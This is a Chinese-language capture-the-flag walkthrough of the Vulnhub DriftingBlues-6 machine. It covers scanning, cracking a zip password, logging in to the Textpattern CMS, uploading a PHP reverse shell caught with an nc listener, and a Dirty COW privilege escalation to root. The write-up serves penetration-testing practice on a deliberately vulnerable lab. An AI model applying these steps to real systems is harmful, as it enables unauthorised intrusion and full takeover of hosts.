靶机渗透练习Vulnhub DriftingBlues-6

攻击机ip

192.168.159.88

扫描主机

arp-scan -I eth0 -l

靶机渗透练习Vulnhub DriftingBlues-6_第1张图片

 得到靶机ip:

192.168.159.144  

扫描端口

nmap -sS -A -sV -T4 -p- 192.168.159.144  

靶机渗透练习Vulnhub DriftingBlues-6_第2张图片 访问网页

192.168.159.144  

靶机渗透练习Vulnhub DriftingBlues-6_第3张图片

 没发现什么有用的信息

目录扫描

 使用dirb发现了robots.txt和/textpattern/textpattern

dirb 192.168.159.144  

扫描网站的后台 发现了robots.txt ,访问

靶机渗透练习Vulnhub DriftingBlues-6_第4张图片

User-agent: *
Disallow: /textpattern/textpattern

dont forget to add .zip extension to your dir-brute
;)

发现禁止爬取,然后根据提示访问 /textpattern/textpattern 发现了登入后台

靶机渗透练习Vulnhub DriftingBlues-6_第5张图片

进入后台,访问

http://192.168.159.144/textpattern/textpattern/

靶机渗透练习Vulnhub DriftingBlues-6_第6张图片

但是我们没有账号和密码

使用工具gobuster寻找后缀为zip的目录

安装工具gobuster

apt-get install gobuster

安装seclists字典:

apt-get install seclists

扫描目录

gobuster dir -u “192.168.159.144” -w /root/tools/directory-list-2.3-medium.txt -x php,html,txt,zip,bak

指纹识别出是Textpattern CMS

robots.txt中还有提示不要忘了zip,看到扫描结果中有 /spammer.zip,下载得到一个压缩包,尝试打开发现有密码

gobuster dir -u http://192.168.159.144 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip

靶机渗透练习Vulnhub DriftingBlues-6_第7张图片 访问

http://192.168.159.144/spammer.zip

得到一个有密码的zip文件

使用kali破解zip压缩包密码

 1.使用zip2john爆破得到zip密码

zip2john spammer.zip > password.txt

2.使用john破解

john password.txt

靶机渗透练习Vulnhub DriftingBlues-6_第8张图片 得到密码

myspace4

解压zip文件

靶机渗透练习Vulnhub DriftingBlues-6_第9张图片

得到了一个用户名和密码

mayer:lionheart

用这个用户名和密码登入之前的网址

http://192.168.159.144/textpattern/textpattern/

进去后看到cms的版本是4.8.3

靶机渗透练习Vulnhub DriftingBlues-6_第10张图片

 思路一:kali本地搜索漏洞

searchsploit textpattern 4.8.3 

靶机渗透练习Vulnhub DriftingBlues-6_第11张图片

 查看49620.py详细信息与使用方法

searchsploit -x php/webapps/49620.py

靶机渗透练习Vulnhub DriftingBlues-6_第12张图片

python3 exploit.py -t http://example.com/ -u USER -p PASSWORD -c "whoami" -d

输入命令

因为回看脚本,他会自己给你加一个testpattern,所以url参数就不用加那么多textpattern了

python3 48943.py http://192.168.159.144/textpattern mayer lionheart 

发现还是报错,用不了

思路二:寻找网站内的漏洞

在content那发现存在文件上传

靶机渗透练习Vulnhub DriftingBlues-6_第13张图片

在该处上传kali上的/usr/share/webshells/php/php-reverse-shell.php,上传前需要修ip和port 分别为攻击机ip和攻击机监听的tcp端口。

cd /usr/share/webshells/php

靶机渗透练习Vulnhub DriftingBlues-6_第14张图片

修改php

靶机渗透练习Vulnhub DriftingBlues-6_第15张图片

上传shell

靶机渗透练习Vulnhub DriftingBlues-6_第16张图片 监听1234端口

nc -nlvp 1234

上传webshell

靶机渗透练习Vulnhub DriftingBlues-6_第17张图片我们在admin管理界面可以看到上传地址 

靶机渗透练习Vulnhub DriftingBlues-6_第18张图片

访问

http://192.168.159.144/textpattern/files

靶机渗透练习Vulnhub DriftingBlues-6_第19张图片 点击php-reverse-shell.php

回到kali已经监听成功

获得交互shell

python -c 'import pty; pty.spawn("/bin/bash")'

靶机渗透练习Vulnhub DriftingBlues-6_第20张图片

脏牛提权

查看linux的版本信息

uname -a

内核版本>= 2.6.22 , 尝试脏牛提权

在github上下载提权脚本

https://github.com/FireFart/dirtycow

然后通过网站的文件上传漏洞解压后上传至后台

进入上传文件的文件夹

cd  /var/www/textpattern/files

靶机渗透练习Vulnhub DriftingBlues-6_第21张图片

进行编译,生成一个dirty的可执行文件

gcc -pthread dirty.c -o dirty -lcrypt

执行文件

./dirty

然后会让我们输入一个密码

靶机渗透练习Vulnhub DriftingBlues-6_第22张图片

 然后我们可以用用户名:firefart 密码:root

进入一个有root权限的用户

切换用户

su firefart

进入/root

cd /root

靶机渗透练习Vulnhub DriftingBlues-6_第23张图片 得到flag.txt

靶机渗透练习Vulnhub DriftingBlues-6_第24张图片

参考文章

http://t.csdn.cn/nvjQG
http://t.csdn.cn/Jp7Ku
https://github.com/FireFart/dirtycow

你可能感兴趣的:(php,安全,网络,web安全)